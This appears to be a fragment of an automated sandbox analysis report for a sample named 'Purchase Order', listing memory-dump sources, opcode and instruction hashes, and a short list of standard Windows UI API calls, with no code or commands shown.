                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0f8ccab74c3fbbd021694b420907a59f4d238d7a1b374fef56a7ba212d6c3284
                                                                                                  • Instruction ID: 846f5aa5d22ad6da9f644aeae12d547937cd6b6263bb2193e43f8026f9ad8890
                                                                                                  • Opcode Fuzzy Hash: 0f8ccab74c3fbbd021694b420907a59f4d238d7a1b374fef56a7ba212d6c3284
                                                                                                  • Instruction Fuzzy Hash: 68D1A274E00218CFDB54DFA5D995B9DBBB2BF89300F1081A9D408AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 176331ae5bc8dee77e9c101c3c603fe2502e29b797bc51a49f7eceef7252a8ae
                                                                                                  • Instruction ID: a6eb502747d7d0303b45196ecab9e4218928a962eae85635d66f7940b10d3ddb
                                                                                                  • Opcode Fuzzy Hash: 176331ae5bc8dee77e9c101c3c603fe2502e29b797bc51a49f7eceef7252a8ae
                                                                                                  • Instruction Fuzzy Hash: 66D1A274E01218CFDB54DFA9D985B9DBBB2BF89300F1081A9D808AB365DB359D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8492932eb5fc3d062342b2fff4fb8e2070d9c2804d73a80b0b5adc81e060d25b
                                                                                                  • Instruction ID: 95380f1471c734cdce54f47b7047fea364bb886665ecb42434a29abff95554b5
                                                                                                  • Opcode Fuzzy Hash: 8492932eb5fc3d062342b2fff4fb8e2070d9c2804d73a80b0b5adc81e060d25b
                                                                                                  • Instruction Fuzzy Hash: 39D1B274E01218CFDB54DFA5D985B9DBBB2BF89300F1081A9D808AB365DB399D86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fec27c0f7a814ad547240d5497792801b29939aa970a05c9f5d04402b372a63f
                                                                                                  • Instruction ID: 373dfb480303b041c09fce6e0e082cce9270b6d8925ed0ac2aee00f58e96a0b9
                                                                                                  • Opcode Fuzzy Hash: fec27c0f7a814ad547240d5497792801b29939aa970a05c9f5d04402b372a63f
                                                                                                  • Instruction Fuzzy Hash: D5D1C074E01218CFDB54DFA5D995B9DBBB2BF89300F1081A9D808AB364DB359E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 00a840978fac49153f9d8d7b039b1857807ab387d3701731119fd71cdcac89bd
                                                                                                  • Instruction ID: 2fd0c7f97805bf33c67718ad39265bf3df83f6733ba5d435dda5f5b33582a63e
                                                                                                  • Opcode Fuzzy Hash: 00a840978fac49153f9d8d7b039b1857807ab387d3701731119fd71cdcac89bd
                                                                                                  • Instruction Fuzzy Hash: 8FD1BE78E00218DFDB54DFA9D984B9DBBB2BF89300F1081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 309b4221ec24c3bc50750be366f824d7abd8288f1a6642508906aa91e808e52b
                                                                                                  • Instruction ID: 5545fb7f80336f19bdf1db16eb8f22a75151773db12082698b3f12ef70ee1d69
                                                                                                  • Opcode Fuzzy Hash: 309b4221ec24c3bc50750be366f824d7abd8288f1a6642508906aa91e808e52b
                                                                                                  • Instruction Fuzzy Hash: F2D1AD78E00218DFDB54DFA9D984B9DBBB2BF89300F1081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd4f570ba514ad60b032247a352df99a2843f0d655ecb154397bc95f0547958c
                                                                                                  • Instruction ID: a0098a25c96606a26b6d581f36d3eb6f2cbeaa1ecae7524456c3b715a6736c7e
                                                                                                  • Opcode Fuzzy Hash: fd4f570ba514ad60b032247a352df99a2843f0d655ecb154397bc95f0547958c
                                                                                                  • Instruction Fuzzy Hash: 8CD1BD74E002188FDB54DFA9D985B9DBBB2BF89300F1081A9D808BB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3b25a23535abea693f4bd60f02394b80e2a90e9d195421415781d56b318026b1
                                                                                                  • Instruction ID: 635f3edaa7c4937eacdbe26c17c85956299a08928dab10ac39f90d854b111f4d
                                                                                                  • Opcode Fuzzy Hash: 3b25a23535abea693f4bd60f02394b80e2a90e9d195421415781d56b318026b1
                                                                                                  • Instruction Fuzzy Hash: FBD1AE78E00218CFDB54DFA9D985B9DBBB2BF89300F1081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 709c90f648997f01cbaee30f80a35bcb979f63934ecf3d13c5c7790cc72af2d2
                                                                                                  • Instruction ID: d82e836f8c524b2c5d41b2ad5da081e476b9767f317dacc6c085ec31ff518a95
                                                                                                  • Opcode Fuzzy Hash: 709c90f648997f01cbaee30f80a35bcb979f63934ecf3d13c5c7790cc72af2d2
                                                                                                  • Instruction Fuzzy Hash: 5DD1CE74E00218CFDB54CFA9D980B9DBBB2BF89300F1081A9D808AB365DB355E86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c525d94dda5fe208928687a00af14a7a8960cf398d02ec35f28feea274077041
                                                                                                  • Instruction ID: eaf0e3600bc46c042834d95968560857498bdb9c81ba780bb4f890a9c8479899
                                                                                                  • Opcode Fuzzy Hash: c525d94dda5fe208928687a00af14a7a8960cf398d02ec35f28feea274077041
                                                                                                  • Instruction Fuzzy Hash: 9DD1AC74E00218CFDB54DFA9D981B9DBBB2BF89300F1081A9D808AB365DB355E86CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cc9e3f64688a389180ddbb2ef301f5ee3dede6cd1d224ad07bdb475d31da9f5e
                                                                                                  • Instruction ID: 6d39f3ae9a422d6a88c55db24be87e5714376114e0b316115674d29b6f55d5b8
                                                                                                  • Opcode Fuzzy Hash: cc9e3f64688a389180ddbb2ef301f5ee3dede6cd1d224ad07bdb475d31da9f5e
                                                                                                  • Instruction Fuzzy Hash: A0D1AE74E00218DFDB54DFA9D981B9DBBB2BF89300F2081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dca8041386e9b08d2df27dbf3f5b229e5a6cd63dee6aa7bb58aa7bb1cb0f384f
                                                                                                  • Instruction ID: 39bdbe6d771a598db80079cfbe3c8d7474ce39d357bfe9bd97386e98af1b6bc6
                                                                                                  • Opcode Fuzzy Hash: dca8041386e9b08d2df27dbf3f5b229e5a6cd63dee6aa7bb58aa7bb1cb0f384f
                                                                                                  • Instruction Fuzzy Hash: D9D1BE78E00218CFDB54DFA9D991B9DBBB2BF89300F1080A9D808AB365DB355D86CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f9f83860b6366701882fb8d8623c291d9c433d0fa20e0803104935de9129bf61
                                                                                                  • Instruction ID: 3870b75c10b0a752642fffb4c49320d8cf278c3ce5a44e983c60e151cd5d5b31
                                                                                                  • Opcode Fuzzy Hash: f9f83860b6366701882fb8d8623c291d9c433d0fa20e0803104935de9129bf61
                                                                                                  • Instruction Fuzzy Hash: 9AD1AD74E002189FDB54DFA9D984B9DBBB2BF89300F1081A9D808AB365DB355E86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eea8946578e5721f75e076da64affada430fe21fcea37ec60608e513dc4b995e
                                                                                                  • Instruction ID: 45cd813e1e2bd7c5ea5a74fd2f125aa466786a1e1b47582afd69a03339f897f6
                                                                                                  • Opcode Fuzzy Hash: eea8946578e5721f75e076da64affada430fe21fcea37ec60608e513dc4b995e
                                                                                                  • Instruction Fuzzy Hash: 3DD1AD74E00218DFDB54DFA9D980B9DBBB2BF89300F1081A9D808AB365DB355D86CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3bcdf9320b718139050b22289581056a7457e8051d1324f8c6290b20ddc721ae
                                                                                                  • Instruction ID: 3a4e1c9f46a062de34bd6bf45a0c564549599dd66d7f6620d754e93d514e0eff
                                                                                                  • Opcode Fuzzy Hash: 3bcdf9320b718139050b22289581056a7457e8051d1324f8c6290b20ddc721ae
                                                                                                  • Instruction Fuzzy Hash: 45D1BD74E00218CFDB54DFA9D984B9DBBB2BF89300F1080A9D808AB365DB355D86CF55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1406d17f17a0ac2da8e95f3051af0a5ac63462feff825bd472cdfa84f1ce2684
                                                                                                  • Instruction ID: 8a043583abe98b9c4822e482d78f8064a0cf198ff41a0dd76518825089fe68ae
                                                                                                  • Opcode Fuzzy Hash: 1406d17f17a0ac2da8e95f3051af0a5ac63462feff825bd472cdfa84f1ce2684
                                                                                                  • Instruction Fuzzy Hash: B3D1BF74E00218CFDB54DFA9D990B9DBBB2BF89300F1081A9D808AB365DB355D86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0dea8ccee63c997c96f77ecc9a2eb16bb505ba85a82ad143fedb4b5e67f37b9d
                                                                                                  • Instruction ID: 7a78575c3feb01a7653fe42505a378d0133e47d57983cd537d202b58739d8ef7
                                                                                                  • Opcode Fuzzy Hash: 0dea8ccee63c997c96f77ecc9a2eb16bb505ba85a82ad143fedb4b5e67f37b9d
                                                                                                  • Instruction Fuzzy Hash: 3DC1CF74E00218CFDB54DFA9C984B9DBBB6BF89300F1081A9D809AB365DB359A85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e592e9468dac7edb7cd3f3084fb980d604cc4dee4d3f096dbdf70c85911686a4
                                                                                                  • Instruction ID: 1d281fe793e53a3acf38829034f465f60683e98c2da22acc85d1f8ad68e751c6
                                                                                                  • Opcode Fuzzy Hash: e592e9468dac7edb7cd3f3084fb980d604cc4dee4d3f096dbdf70c85911686a4
                                                                                                  • Instruction Fuzzy Hash: 28C1C074E00218CFDB54DFA9C980B9DBBB6BF89300F1081A9D809AB365DB349E85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6c930e24f90c07c7d6a22dba1410ba9b165eea2c09342e6f344592b08c6545cb
                                                                                                  • Instruction ID: 10b35cb2f638e66eb9d20754e8b50bd4673a33a1895edd9326362096addc18a2
                                                                                                  • Opcode Fuzzy Hash: 6c930e24f90c07c7d6a22dba1410ba9b165eea2c09342e6f344592b08c6545cb
                                                                                                  • Instruction Fuzzy Hash: 65C1C074E00218CFDB54DFA9C954B9DBBB6BF89300F1081A9D809AB365DB349E86CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d42225a9ec3887fd6f8fb2bd5b579ecbe3fbc2b1fd1cefda050385e7709341f3
                                                                                                  • Instruction ID: 2d9be7fb2da3869e7ae75c4cb596f30ab4a759bb6e761fe6fb8991a61c7e4416
                                                                                                  • Opcode Fuzzy Hash: d42225a9ec3887fd6f8fb2bd5b579ecbe3fbc2b1fd1cefda050385e7709341f3
                                                                                                  • Instruction Fuzzy Hash: EFC1C174E00218CFDB14DFA9C954B9DBBB6BF89300F1081A9D809AB365DB359E86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4f0306288a7385ad3c4623fdc5c8ccf2da494c41709e1610dc8db69566e1ec12
                                                                                                  • Instruction ID: e535949db38d4be217c98c60f75cf914aa6c0be05ba20b7c46dd442acb744896
                                                                                                  • Opcode Fuzzy Hash: 4f0306288a7385ad3c4623fdc5c8ccf2da494c41709e1610dc8db69566e1ec12
                                                                                                  • Instruction Fuzzy Hash: B7C1B074E00218CFDB54DFA9C954B9DBBB6BF89300F1081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0662bf4b1024c2df69bd44bfd1606d038756173fb3f7ef2150457261773e8162
                                                                                                  • Instruction ID: a6698e1c1d82d5e67cab81f5168c59800529e418502f2ba90cc53d32d1af1d7a
                                                                                                  • Opcode Fuzzy Hash: 0662bf4b1024c2df69bd44bfd1606d038756173fb3f7ef2150457261773e8162
                                                                                                  • Instruction Fuzzy Hash: 9BC1B074E00218CFDB54DFA9C994B9DBBB6BF89300F1081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a8ed5a0faad0be8ffcf4dfb286aadd390f1fa30d5f9a68d0646d74895fa520db
                                                                                                  • Instruction ID: 47ddc6031cffeb2172c38c4e575e2d98be083ad6f07f6318f914cda2598b46ad
                                                                                                  • Opcode Fuzzy Hash: a8ed5a0faad0be8ffcf4dfb286aadd390f1fa30d5f9a68d0646d74895fa520db
                                                                                                  • Instruction Fuzzy Hash: 95C1C174E00218CFDB54DFA9C994B9DBBB6BF89300F1081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ec25a5dffa76ac352001534ceb94c40bfe2db01871c735a460a392d4a2e5773b
                                                                                                  • Instruction ID: 1ba6e25c3f2a8595004a53f5735349f8b8f1282903a57de3631646a253865f93
                                                                                                  • Opcode Fuzzy Hash: ec25a5dffa76ac352001534ceb94c40bfe2db01871c735a460a392d4a2e5773b
                                                                                                  • Instruction Fuzzy Hash: 04C1C074E00218CFDB54DFA9C984B9DBBB6BF89300F1081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db69805b36d0136265748c985e8c40d4770d9004babd1e6320f18d1992b7ac36
                                                                                                  • Instruction ID: 6b224a6113932439a0607a256eb6707cb8efabf9162b0aa02b7824efc82d4e07
                                                                                                  • Opcode Fuzzy Hash: db69805b36d0136265748c985e8c40d4770d9004babd1e6320f18d1992b7ac36
                                                                                                  • Instruction Fuzzy Hash: DDC1C074E00218CFDB54DFA9C954B9DBBB6BF89300F1081A9D809AB365DB349E86CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1ff789c0f3d652fdeeb82d0634b5c46f4e4a5cf3502d58a77219524d8dc1ed60
                                                                                                  • Instruction ID: f901e1a069d75257c84616ab31187877f7b0f3e0f0863278aa9ad6c03fcbecab
                                                                                                  • Opcode Fuzzy Hash: 1ff789c0f3d652fdeeb82d0634b5c46f4e4a5cf3502d58a77219524d8dc1ed60
                                                                                                  • Instruction Fuzzy Hash: 1DC1C174E00218CFDB54DFA9C954B9DBBB6BF89300F2081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 090f291ec450c19c8b97ff66d7b8ae951748998e14384e19487ef1718aaf0a64
                                                                                                  • Instruction ID: 061ffe01db6e33d3f2000270271dc9bf2f6d4b469661963c892723cb0e2e71a8
                                                                                                  • Opcode Fuzzy Hash: 090f291ec450c19c8b97ff66d7b8ae951748998e14384e19487ef1718aaf0a64
                                                                                                  • Instruction Fuzzy Hash: 4BC1C074E00218CFDB54DFA9C950B9DBBB6BF89300F2081A9D809AB365DB359E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 76536b83edc7a2f664cb656e806277a71e489c7755a88542e1b9804984505eb2
                                                                                                  • Instruction ID: 0f57a03ca1d43f750df60da39af5fd2ae4ca6e57ffb635b36ca2adc1c815209a
                                                                                                  • Opcode Fuzzy Hash: 76536b83edc7a2f664cb656e806277a71e489c7755a88542e1b9804984505eb2
                                                                                                  • Instruction Fuzzy Hash: 0AC1C174E00218CFDB54DFA9C954B9DBBB6BF89300F2081A9D809AB365DB349E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386784679.0000000039AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39ab0000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bbff34f7bc40450e6ee5d54daf5fbec222caecc3b6c45cfcfabb0ff8be91d283
                                                                                                  • Instruction ID: 9082da88d874246a1d9663bf8bb2d5dba8d987964bb0992d5d78f6cb19a5f5fd
                                                                                                  • Opcode Fuzzy Hash: bbff34f7bc40450e6ee5d54daf5fbec222caecc3b6c45cfcfabb0ff8be91d283
                                                                                                  • Instruction Fuzzy Hash: 6FC1C074E00218CFDB54DFA9C944B9DBBB6BF89300F2081A9D809AB365DB359E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3386945525.0000000039D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 39D10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_39d10000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fa9157265b9cdc7007c5a11d2755672a9535f5051a9ec2f4584f5a6f5eeb4347
                                                                                                  • Instruction ID: c0866df731aa145c5dc2e488ffd325984bd6f6ad8176896368bb277a7ebe4db2
                                                                                                  • Opcode Fuzzy Hash: fa9157265b9cdc7007c5a11d2755672a9535f5051a9ec2f4584f5a6f5eeb4347
                                                                                                  • Instruction Fuzzy Hash: 36C1CF74E00218CFDB54DFA9D981B9DBBB2BF89300F1081A9D809AB365DB359E85CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a920aac7cb8eabd50c26e4f69142f4859131930930087442e979915452bc8155
                                                                                                  • Instruction ID: d167374e4aead18ad74b962c3b4f9ee4a831f19c879a45a77c68338ac9dacdef
                                                                                                  • Opcode Fuzzy Hash: a920aac7cb8eabd50c26e4f69142f4859131930930087442e979915452bc8155
                                                                                                  • Instruction Fuzzy Hash: EAA17C74A01228CFDB68DF64C994BD9BBB2BB49300F1085EAD409A7260DB359EC2CF51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 46425e91bcaabf843159afb17139de985cfa9daa65e2acbace0f64a374bc28d2
                                                                                                  • Instruction ID: 1f3140a738acba8a1efd694dfc4995ea560ed5510862d3050dc1e6868a2e8cba
                                                                                                  • Opcode Fuzzy Hash: 46425e91bcaabf843159afb17139de985cfa9daa65e2acbace0f64a374bc28d2
                                                                                                  • Instruction Fuzzy Hash: 90518074A01229CFDB68DF24C854BD9B7B2BF4A305F5085E9D40AA7360CB359E82CF51
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004052AD
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004052BC
                                                                                                  • GetClientRect.USER32(?,?), ref: 004052F9
                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405300
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
